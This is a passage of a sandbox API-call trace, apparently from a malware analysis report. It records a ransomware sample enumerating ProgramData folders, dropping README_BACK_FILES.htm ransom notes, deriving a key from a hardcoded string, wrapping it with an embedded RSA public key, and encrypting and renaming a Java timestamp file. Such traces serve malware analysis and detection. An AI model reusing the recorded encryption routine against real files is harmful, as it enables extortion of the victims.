(lpFileName="C:\\\\ProgramData\\Microsoft\\WwanSvc\\DMProfiles\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\wwansvc\\dmprofiles\\readme_back_files.htm")) returned 0xffffffff [0237.946] AreFileApisANSI () returned 1 [0237.946] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2f6cc0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 67 [0237.946] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\WwanSvc\\DMProfiles\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\wwansvc\\dmprofiles\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.946] GetLastError () returned 0x5 [0237.946] GetLastError () returned 0x5 [0237.947] FindNextFileA (in: hFindFile=0x2845ea0, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0237.947] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\WwanSvc\\Profiles\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x28463e0 [0237.947] FindNextFileA (in: hFindFile=0x28463e0, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0237.947] FindNextFileA (in: hFindFile=0x28463e0, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0237.947] FindClose (in: hFindFile=0x28463e0 | out: hFindFile=0x28463e0) returned 1 [0237.948] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\WwanSvc\\Profiles\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\wwansvc\\profiles\\readme_back_files.htm")) returned 0xffffffff [0237.948] AreFileApisANSI () returned 1 [0237.948] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2f6c68, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0237.948] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\WwanSvc\\Profiles\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\wwansvc\\profiles\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.948] GetLastError () returned 0x5 [0237.948] GetLastError () returned 0x5 [0237.948] FindNextFileA (in: hFindFile=0x2845ea0, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0 [0237.948] FindClose (in: hFindFile=0x2845ea0 | out: hFindFile=0x2845ea0) returned 1 [0237.948] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\WwanSvc\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\wwansvc\\readme_back_files.htm")) returned 0xffffffff [0237.949] AreFileApisANSI () returned 1 [0237.949] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cd028, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0237.949] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\WwanSvc\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\wwansvc\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9f2e4, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.949] GetLastError () returned 0x5 [0237.949] GetLastError () returned 0x5 [0237.949] FindNextFileA (in: hFindFile=0x2716c68, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0 [0237.949] FindClose (in: hFindFile=0x2716c68 | out: hFindFile=0x2716c68) returned 1 [0237.949] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\readme_back_files.htm")) returned 0xffffffff [0237.949] AreFileApisANSI () returned 1 [0237.949] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x39c408, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0237.949] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9f680, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.949] GetLastError () returned 0x5 [0237.950] GetLastError () returned 0x5 [0237.950] FindNextFileA (in: hFindFile=0x2716aa8, lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 1 [0237.950] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft OneDrive\\*.*", lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0x28463e0 [0237.950] FindNextFileA (in: hFindFile=0x28463e0, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0237.950] FindNextFileA (in: hFindFile=0x28463e0, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0237.950] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft OneDrive\\setup\\*.*", lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0x2846460 [0237.950] FindNextFileA (in: hFindFile=0x2846460, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0237.950] FindNextFileA (in: hFindFile=0x2846460, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0 [0237.950] FindClose (in: hFindFile=0x2846460 | out: hFindFile=0x2846460) returned 1 [0237.950] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft OneDrive\\setup\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft onedrive\\setup\\readme_back_files.htm")) returned 0xffffffff [0237.950] AreFileApisANSI () returned 1 [0237.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cd3d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 63 [0237.950] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft OneDrive\\setup\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft onedrive\\setup\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9f2e4, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d08 [0237.951] GetFileType (hFile=0x5d08) returned 0x1 [0237.951] WriteFile (in: hFile=0x5d08, lpBuffer=0x2b9df30*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9df28, lpOverlapped=0x0 | out: lpBuffer=0x2b9df30*, lpNumberOfBytesWritten=0x2b9df28*=0x5ec, lpOverlapped=0x0) returned 1 [0237.952] FindNextFileA (in: hFindFile=0x28463e0, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0 [0237.952] FindClose (in: hFindFile=0x28463e0 | out: hFindFile=0x28463e0) returned 1 [0237.953] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft OneDrive\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft onedrive\\readme_back_files.htm")) returned 0xffffffff [0237.953] AreFileApisANSI () returned 1 [0237.953] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cd538, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0237.953] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft OneDrive\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft onedrive\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9f680, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cdc [0237.953] GetFileType (hFile=0x5cdc) returned 0x1 [0237.953] WriteFile (in: hFile=0x5cdc, lpBuffer=0x2b9e2cc*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2b9e2cc*, lpNumberOfBytesWritten=0x2b9e2c4*=0x5ec, lpOverlapped=0x0) returned 1 [0237.954] FindNextFileA (in: hFindFile=0x2716aa8, lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 1 [0237.954] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Oracle\\*.*", lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0x28463e0 [0237.956] FindNextFileA (in: hFindFile=0x28463e0, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0237.956] FindNextFileA (in: hFindFile=0x28463e0, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0237.956] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Oracle\\Java\\*.*", lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0x2846460 [0237.957] FindNextFileA (in: hFindFile=0x2846460, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0237.957] FindNextFileA (in: hFindFile=0x2846460, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0237.957] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Oracle\\Java\\.oracle_jre_usage\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x2845ea0 [0237.958] FindNextFileA (in: hFindFile=0x2845ea0, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0237.958] FindNextFileA (in: hFindFile=0x2845ea0, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0237.958] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0237.958] GetLastError () returned 0x0 [0237.958] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Oracle\\Java\\.oracle_jre_usage\\17dfc292991c7c24.timestamp" (normalized: "c:\\programdata\\oracle\\java\\.oracle_jre_usage\\17dfc292991c7c24.timestamp")) returned 0x20 [0237.959] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Oracle\\Java\\.oracle_jre_usage\\17dfc292991c7c24.timestamp", dwFileAttributes=0x80) returned 1 [0237.959] CreateFileA (lpFileName="C:\\\\ProgramData\\Oracle\\Java\\.oracle_jre_usage\\17dfc292991c7c24.timestamp" (normalized: "c:\\programdata\\oracle\\java\\.oracle_jre_usage\\17dfc292991c7c24.timestamp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d14 [0237.959] CreateFileA (lpFileName="C:\\\\ProgramData\\Oracle\\Java\\.oracle_jre_usage\\17dfc292991c7c24.timestamp.gsg" (normalized: "c:\\programdata\\oracle\\java\\.oracle_jre_usage\\17dfc292991c7c24.timestamp.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d18 [0237.960] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Oracle\\Java\\.oracle_jre_usage\\17dfc292991c7c24.timestamp.gsg", dwFileAttributes=0x2) returned 1 [0237.961] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x2858160) returned 1 [0237.963] CryptCreateHash (in: hProv=0x2858160, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0237.963] lstrlenA (lpString="GASinrxNGZdGxepxtSAFGoQZzMlQm") returned 29 [0237.963] CryptHashData (hHash=0x2845de0, pbData=0x2ec6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0237.963] CryptDeriveKey (in: hProv=0x2858160, Algid=0x6610, hBaseData=0x2845de0, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x28467e0) returned 1 [0237.963] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0237.963] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0237.963] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x28597b0) returned 1 [0237.963] CryptImportPublicKeyInfo (in: hCryptProv=0x28597b0, dwCertEncodingType=0x1, pInfo=0x2868ea8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2868ed8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2868ee0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x28469a0) returned 1 [0237.963] CryptEncrypt (in: hKey=0x28469a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0237.963] CryptEncrypt (in: hKey=0x28469a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2859d88*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x2859d88*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0237.963] WriteFile (in: hFile=0x5d18, lpBuffer=0x2859d88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x2859d88*, lpNumberOfBytesWritten=0x2b9dcd8*=0x80, lpOverlapped=0x0) returned 1 [0237.965] ReadFile (in: hFile=0x5d14, lpBuffer=0x2778ae0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x2778ae0*, lpNumberOfBytesRead=0x2b9dcd8*=0x33, lpOverlapped=0x0) returned 1 [0237.966] CryptEncrypt (in: hKey=0x28467e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2778ae0*, pdwDataLen=0x2b9dcd8*=0x33, dwBufLen=0x400 | out: pbData=0x2778ae0*, pdwDataLen=0x2b9dcd8*=0x40) returned 1 [0237.966] WriteFile (in: hFile=0x5d18, lpBuffer=0x2778ae0*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x2778ae0*, lpNumberOfBytesWritten=0x2b9dcd8*=0x40, lpOverlapped=0x0) returned 1 [0237.966] CloseHandle (hObject=0x5d14) returned 1 [0237.966] CloseHandle (hObject=0x5d18) returned 1 [0237.968] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Oracle\\Java\\.oracle_jre_usage\\17dfc292991c7c24.timestamp.gsg" (normalized: "c:\\programdata\\oracle\\java\\.oracle_jre_usage\\17dfc292991c7c24.timestamp.gsg"), lpNewFileName="C:\\\\ProgramData\\Oracle\\Java\\.oracle_jre_usage\\17dfc292991c7c24.timestamp" (normalized: "c:\\programdata\\oracle\\java\\.oracle_jre_usage\\17dfc292991c7c24.timestamp"), bFailIfExists=0) returned 1 [0237.974] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Oracle\\Java\\.oracle_jre_usage\\17dfc292991c7c24.timestamp", dwFileAttributes=0x0) returned 1 [0237.974] DeleteFileA (lpFileName="C:\\\\ProgramData\\Oracle\\Java\\.oracle_jre_usage\\17dfc292991c7c24.timestamp.gsg" (normalized: "c:\\programdata\\oracle\\java\\.oracle_jre_usage\\17dfc292991c7c24.timestamp.gsg")) returned 1 [0237.976] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Oracle\\Java\\.oracle_jre_usage\\17dfc292991c7c24.timestamp" (normalized: "c:\\programdata\\oracle\\java\\.oracle_jre_usage\\17dfc292991c7c24.timestamp"), lpNewFileName="C:\\\\ProgramData\\Oracle\\Java\\.oracle_jre_usage\\17dfc292991c7c24.timestamp.fuck" (normalized: "c:\\programdata\\oracle\\java\\.oracle_jre_usage\\17dfc292991c7c24.timestamp.fuck")) returned 1 [0237.977] CryptDestroyHash (hHash=0x2845de0) returned 1 [0237.977] CryptDestroyKey (hKey=0x28467e0) returned 1 [0237.977] CryptReleaseContext (hProv=0x2858160, dwFlags=0x0) returned 1 [0237.977] FindNextFileA (in: hFindFile=0x2845ea0, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0237.977] FindClose (in: hFindFile=0x2845ea0 | out: hFindFile=0x2845ea0) returned 1 [0237.977] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Oracle\\Java\\.oracle_jre_usage\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\oracle\\java\\.oracle_jre_usage\\readme_back_files.htm")) returned 0xffffffff [0237.977] AreFileApisANSI () returned 1 [0237.977] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2f7030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0237.977] CreateFileW (lpFileName="C:\\\\ProgramData\\Oracle\\Java\\.oracle_jre_usage\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\oracle\\java\\.oracle_jre_usage\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d10 [0237.978] GetFileType (hFile=0x5d10) returned 0x1 [0237.978] WriteFile (in: hFile=0x5d10, lpBuffer=0x2b9db94*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9db8c, lpOverlapped=0x0 | out: lpBuffer=0x2b9db94*, lpNumberOfBytesWritten=0x2b9db8c*=0x5ec, lpOverlapped=0x0) returned 1 [0237.979] FindNextFileA (in: hFindFile=0x2846460, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0237.979] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Oracle\\Java\\installcache_x64\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x2845de0 [0237.979] FindNextFileA (in: hFindFile=0x2845de0, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0237.979] FindNextFileA (in: hFindFile=0x2845de0, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0237.979] FindNextFileA (in: hFindFile=0x2845de0, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0237.979] FindClose (in: hFindFile=0x2845de0 | out: hFindFile=0x2845de0) returned 1 [0237.980] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Oracle\\Java\\installcache_x64\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\oracle\\java\\installcache_x64\\readme_back_files.htm")) returned 0xffffffff [0237.980] AreFileApisANSI () returned 1 [0237.980] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2f6e78, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 67 [0237.980] CreateFileW (lpFileName="C:\\\\ProgramData\\Oracle\\Java\\installcache_x64\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\oracle\\java\\installcache_x64\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.981] GetLastError () returned 0x5 [0237.981] GetLastError () returned 0x5 [0237.981] FindNextFileA (in: hFindFile=0x2846460, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0237.981] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Oracle\\Java\\javapath\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x2845de0 [0237.981] FindNextFileA (in: hFindFile=0x2845de0, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0237.981] FindNextFileA (in: hFindFile=0x2845de0, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0237.981] FindNextFileA (in: hFindFile=0x2845de0, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0237.981] FindNextFileA (in: hFindFile=0x2845de0, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0237.981] FindNextFileA (in: hFindFile=0x2845de0, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0237.981] FindClose (in: hFindFile=0x2845de0 | out: hFindFile=0x2845de0) returned 1 [0237.981] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Oracle\\Java\\javapath\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\oracle\\java\\javapath\\readme_back_files.htm")) returned 0xffffffff [0237.982] AreFileApisANSI () returned 1 [0237.982] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cd3d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 59 [0237.982] CreateFileW (lpFileName="C:\\\\ProgramData\\Oracle\\Java\\javapath\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\oracle\\java\\javapath\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.982] GetLastError () returned 0x5 [0237.982] GetLastError () returned 0x5 [0237.982] FindNextFileA (in: hFindFile=0x2846460, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0237.982] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Oracle\\Java\\javapath_target_5923062\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x2845de0 [0237.982] FindNextFileA (in: hFindFile=0x2845de0, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0237.982] FindNextFileA (in: hFindFile=0x2845de0, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0237.982] FindNextFileA (in: hFindFile=0x2845de0, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0237.983] FindNextFileA (in: hFindFile=0x2845de0, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0237.983] FindNextFileA (in: hFindFile=0x2845de0, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0237.983] FindClose (in: hFindFile=0x2845de0 | out: hFindFile=0x2845de0) returned 1 [0237.983] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Oracle\\Java\\javapath_target_5923062\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\oracle\\java\\javapath_target_5923062\\readme_back_files.htm")) returned 0xffffffff [0237.983] AreFileApisANSI () returned 1 [0237.983] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2f6fd8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 74 [0237.983] CreateFileW (lpFileName="C:\\\\ProgramData\\Oracle\\Java\\javapath_target_5923062\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\oracle\\java\\javapath_target_5923062\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.983] GetLastError () returned 0x5 [0237.983] GetLastError () returned 0x5 [0237.983] FindNextFileA (in: hFindFile=0x2846460, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0 [0237.983] FindClose (in: hFindFile=0x2846460 | out: hFindFile=0x2846460) returned 1 [0237.984] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Oracle\\Java\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\oracle\\java\\readme_back_files.htm")) returned 0xffffffff [0237.984] AreFileApisANSI () returned 1 [0237.984] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cd388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0237.984] CreateFileW (lpFileName="C:\\\\ProgramData\\Oracle\\Java\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\oracle\\java\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9f2e4, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d08 [0237.985] GetFileType (hFile=0x5d08) returned 0x1 [0237.985] WriteFile (in: hFile=0x5d08, lpBuffer=0x2b9df30*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9df28, lpOverlapped=0x0 | out: lpBuffer=0x2b9df30*, lpNumberOfBytesWritten=0x2b9df28*=0x5ec, lpOverlapped=0x0) returned 1 [0237.986] FindNextFileA (in: hFindFile=0x28463e0, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0 [0237.986] FindClose (in: hFindFile=0x28463e0 | out: hFindFile=0x28463e0) returned 1 [0237.994] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Oracle\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\oracle\\readme_back_files.htm")) returned 0xffffffff [0237.994] AreFileApisANSI () returned 1 [0237.994] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x39c088, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0237.994] CreateFileW (lpFileName="C:\\\\ProgramData\\Oracle\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\oracle\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9f680, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cdc [0237.995] GetFileType (hFile=0x5cdc) returned 0x1 [0237.996] WriteFile (in: hFile=0x5cdc, lpBuffer=0x2b9e2cc*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2b9e2cc*, lpNumberOfBytesWritten=0x2b9e2c4*=0x5ec, lpOverlapped=0x0) returned 1 [0237.997] FindNextFileA (in: hFindFile=0x2716aa8, lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 1 [0237.997] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Package Cache\\*.*", lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0x28463e0 [0238.011] FindNextFileA (in: hFindFile=0x28463e0, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0238.012] FindNextFileA (in: hFindFile=0x28463e0, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0238.012] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\*.*", lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0x2845de0 [0238.012] FindNextFileA (in: hFindFile=0x2845de0, 